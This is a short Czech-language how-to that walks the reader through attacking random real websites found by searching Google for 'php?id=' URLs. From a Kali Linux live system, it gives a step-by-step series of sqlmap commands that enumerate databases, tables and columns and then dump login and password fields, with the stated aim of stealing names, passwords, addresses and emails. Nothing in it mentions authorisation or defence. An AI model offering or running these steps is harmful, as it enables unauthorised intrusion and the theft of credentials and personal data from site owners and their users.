V tomto článku vám ukážu jak se dá jednoduše hacknout webová stránka a poté odcizení databáze a zjištění jmen a hesel (ale i adresy, tel. čísla, emaily atd. ). Budete potřebovat tři věci věci:
- Linuxovou distribuci kali linux
- Webovou stránku, která končí na php?id= (takové stránky lze najít pomocí zadání php?id= do googlu)
- Mozek
Stažení distribuce
-
Nejprve si musíte stáhnout Kali Linux zde na jejich webových stránkách.
-
Po stažení si distribuci nahrajte buďto na CD/DVD nebo na USB FlashDisk více o instalaci zde.
-
Po nahrání distribuce na zařízení restartujte počítač a při startu zapněte bootovaní z Cd/DVD popřípadě USB.
-
Poté na vás vyskočí tabulka kde dáte Live CD, tím se distribuce jen spustí a nebude se instalovat.
-
Pokud by ste chtěli nainstalovat distribuci využijte k tomu například VirtualBox.
Hacknutí stránek
-
Když už máte distribuci spuštěnou najděte si již zmíněnou stránku s koncovkou php?id= a zkopírujte URL.
-
Spusťte terminál, najdete ho na hlavním panelu nebo v menu aplikací.
-
Napište tyto příkazy:
sqlmap -u URL STRÁNKY -–dbs
Vyskočí na vás tabulka kde budou napsané databáze, pokud ne najděte si jinou webovou stránku.Vyberte si nějakou databázi, která se vám zobrazila a napište tento příkaz.
sqlmap -u URL STRÁNKY -D NÁZEV DATABÁZE –-tables
Tato operace bude trvat asi trochu déle, protože se vám vypíše tabulka, kde budou všechny položky v databázi. Vyberte si nějakou složku co vidíte například pokud je Users nebo admin a podobně, u které předpokládáte, že by tam mohly být přístupové údaje. Napište tento příkaz:
sqlmap -u URL STRÁNKY -D NÁZEV DATABÁZE –-columns
Nyní by se vám měli vypsat všechny věci, které jsou v dané databázi. Opět si vyberte nějakou složku například pokud je login, password, admin, username atd. Napište příkaz:
sqlmap -u URL STRÁNKY -D NÁZEV DATABÁZE -C NÁZEV SLOŽKY –-dump
2024 ©